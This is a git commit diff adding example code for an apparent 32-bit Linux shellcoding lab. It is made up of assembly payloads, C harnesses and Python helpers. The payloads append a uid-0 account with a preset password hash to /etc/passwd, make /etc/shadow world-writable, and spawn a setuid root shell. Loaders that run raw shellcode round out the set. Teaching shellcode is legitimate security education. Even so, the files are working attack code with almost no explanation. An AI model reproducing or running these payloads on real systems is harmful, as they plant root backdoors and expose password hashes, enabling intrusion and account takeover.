typo fix

2017-02-01 13:21:01 +01:00
parent 8348a251e3
commit bfba9eba5c
11 changed files with 257 additions and 0 deletions
--- a/x86_32/0x1_SyscallBasics/0x1_Shellcode-Lab_32Bit_Basics.pdf
+++ b/x86_32/0x1_SyscallBasics/0x1_Shellcode-Lab_32Bit_Basics.pdf
--- a/x86_32/0x1_SyscallBasics/Example_Code/adduser_etc_passwd.asm
+++ b/x86_32/0x1_SyscallBasics/Example_Code/adduser_etc_passwd.asm
@@ -0,0 +1,53 @@
 ; shellcode lab @ hack4
 ; dash
 BITS 32
 global _start
 _start:
 xor eax, eax
 xor ebx, ebx
 xor ecx, ecx
 mov eax, 5
 push ebx
 push    0x64777373
 push    0x61702f63
 push    0x74652f2f
 mov ebx, esp
 mov ecx, 0x401
 int 0x80
 ; take filedescriptor
 xor ebx, ebx
 mov ebx, eax
 ; write(f_open, line, 24)
 xor eax, eax
 xor ecx, ecx
 mov eax, 4
 push    ecx
 push byte 0x0a
 push    0x68736162
 push    0x2f6e6962
 push    0x2f3a746f
 push    0x6f722f3a
 push    0x3a303a30
 push    0x3a494e73
 push    0x386b5a39
 push    0x65736d48
 push    0x42413a72
 push    0x336b6361
 push    0x68316f6e
 mov     ecx, esp
 mov edx, 45
 int 0x80
 ;close maybe?? ah forget that :>
 ; exit(23)
 mov eax, 1
 mov ebx, 23
 int 0x80
--- a/x86_32/0x1_SyscallBasics/Example_Code/ascii_converter.py
+++ b/x86_32/0x1_SyscallBasics/Example_Code/ascii_converter.py
@@ -0,0 +1,21 @@
 #!/usr/bin/env python
 #
 # ascii converter for shellcoding-lab at hack4
 # ~dash in 2014
 #
 import sys
 import binascii
 text = sys.argv[1]
 def usage():
 	print "./%s <string2convert>" % (sys.argv[0])
 if len(sys.argv)<2:
 	usage()
 	exit()
 val = binascii.hexlify(text[::-1])
 print "Stringlen: %d" % len(text)
 print "String: %s" % val
--- a/x86_32/0x1_SyscallBasics/Example_Code/ascii_converter2.py
+++ b/x86_32/0x1_SyscallBasics/Example_Code/ascii_converter2.py
@@ -0,0 +1,29 @@
 #!/usr/bin/env python
 import sys
 import binascii
 text = sys.argv[1]
 def usage():
 		print "./%s <string2convert>" % (sys.argv[0])
 if len(sys.argv)<2:
 		usage()
 		exit()
 val = binascii.hexlify(text[::-1])
 print "Stringlen: %d" % len(text)
 print "String: %s" % val
 print
 for i in range(len(val)):
 		if i % 8 == 0:
 				print "push	 0x",
 		print "\b%c" % val[i],
 		i=i+1
 		k = i % 8
 		if k == 0:
 				print
--- a/x86_32/0x1_SyscallBasics/Example_Code/bad_setuid_shell.asm
+++ b/x86_32/0x1_SyscallBasics/Example_Code/bad_setuid_shell.asm
@@ -0,0 +1,21 @@
 global _start
 section .text
 _start:
 ;setuid
 xor     eax, eax
 mov     ebx, eax
 mov     eax, 11
 int     0x80
 ;execve
 xor     ecx, ecx
 push    ecx
 push    0x69732f2f
 push    0x6e69622f
 mov     ebx, esp
 mov     edx, 0x00000000
 xor     eax, eax
 mov     eax, 11
 int     0x80
--- a/x86_32/0x1_SyscallBasics/Example_Code/chmod_shadow_0bytes.asm
+++ b/x86_32/0x1_SyscallBasics/Example_Code/chmod_shadow_0bytes.asm
@@ -0,0 +1,27 @@
 ; shellcodelab@hack4
 ; by dash
 BITS 32
 global _start
 _start:
 xor     eax, eax
 xor     ebx, ebx
 xor     ecx, ecx
 ;chmod
 mov     ecx, 0x1ff      ;0777
 push    ebx             ;null terminator
 push    0x776f6461      ;/etc/shadow
 push    0x68732f63
 push    0x74652f2f
 mov     ebx, esp        ;put the address of esp to ebx (shadow)
 mov     eax, 15
 int     0x80
 ;exit
 xor     eax, eax
 xor     ebx, ebx
 mov     eax, 1
 int     0x80
--- a/x86_32/0x1_SyscallBasics/Example_Code/chmod_shadow_no0.asm
+++ b/x86_32/0x1_SyscallBasics/Example_Code/chmod_shadow_no0.asm
@@ -0,0 +1,26 @@
 ; shellcode-lab@hack4
 ; by dash
 BITS 32
 global _start
 _start:
 xor     eax, eax
 xor     ebx, ebx
 xor     ecx, ecx
 ;chmod
 mov     cx, 0x1ff       ;0777
 push    ebx             ;null terminator
 push    0x776f6461      ;/etc/shadow
 push    0x68732f63
 push    0x74652f2f
 mov     ebx, esp        ;put the address of esp to ebx (shadow)
 mov     al, 15
 int     0x80
 ;exit
 xor     eax, eax
 xor     ebx, ebx
 mov     al, 1
 int     0x80
--- a/x86_32/0x1_SyscallBasics/Example_Code/crypt_des_tool.py
+++ b/x86_32/0x1_SyscallBasics/Example_Code/crypt_des_tool.py
@@ -0,0 +1,19 @@
 #!/usr/bin/env python2
 #
 # crypt des tool for shellcoding lab at hack4
 # ~dash
 import sys
 import crypt
 def usage():
    print "%s <password>" % (sys.argv[0])
 if len(sys.argv)<2:
    usage()
    exit()
 password = sys.argv[1]
 pw = crypt.crypt(password,'AB')
 print "Password: %s" % pw
--- a/x86_32/0x1_SyscallBasics/Example_Code/shell.c
+++ b/x86_32/0x1_SyscallBasics/Example_Code/shell.c
@@ -0,0 +1,20 @@
 /* 	shell.c
 	simple shell for shellcoding-lab at hack4 0x1
 	probably ripped somewhere
 	~dash
 */
 #include <stdio.h>
 #include <unistd.h>
 #include <string.h>
 int main(){
 	char *args[2];
 	setuid(0);
 	args[0] = "/bin/sh";
 	args[1] = NULL;
 	execve(args[0], args, NULL);
 }
--- a/x86_32/0x1_SyscallBasics/Example_Code/skeleton_mmap.c
+++ b/x86_32/0x1_SyscallBasics/Example_Code/skeleton_mmap.c
@@ -0,0 +1,26 @@
 #include <string.h>
 #include <sys/mman.h>
 char shellcode[] = "";
 int main(int argc, char **argv)
 {
  // Allocate some read-write memory
  void *mem = mmap(0, sizeof(shellcode), PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
  // Copy the shellcode into the new memory
  memcpy(mem, shellcode, sizeof(shellcode));
  // Make the memory read-execute
  mprotect(mem, sizeof(shellcode), PROT_READ|PROT_EXEC);
  // Call the shellcode
  int (*func)();
  func = (int (*)())mem;
  (int)(*func)();
  // Now, if we managed to return here, it would be prudent to clean up the memory:
  munmap(mem, sizeof(shellcode));
  return 0;
 }
--- a/x86_32/0x1_SyscallBasics/Example_Code/skeleton_oldstyle.c
+++ b/x86_32/0x1_SyscallBasics/Example_Code/skeleton_oldstyle.c
@@ -0,0 +1,15 @@
 #include <stdio.h>
 #include <string.h>
 #include <unistd.h>
 char shellcode[] = "";
 int main(void)
 {
 int *ret;
    printf("%d\n",strlen(shellcode));
    ret = (int *)&ret+2;
    *ret = (int)shellcode;
 return 0;
 }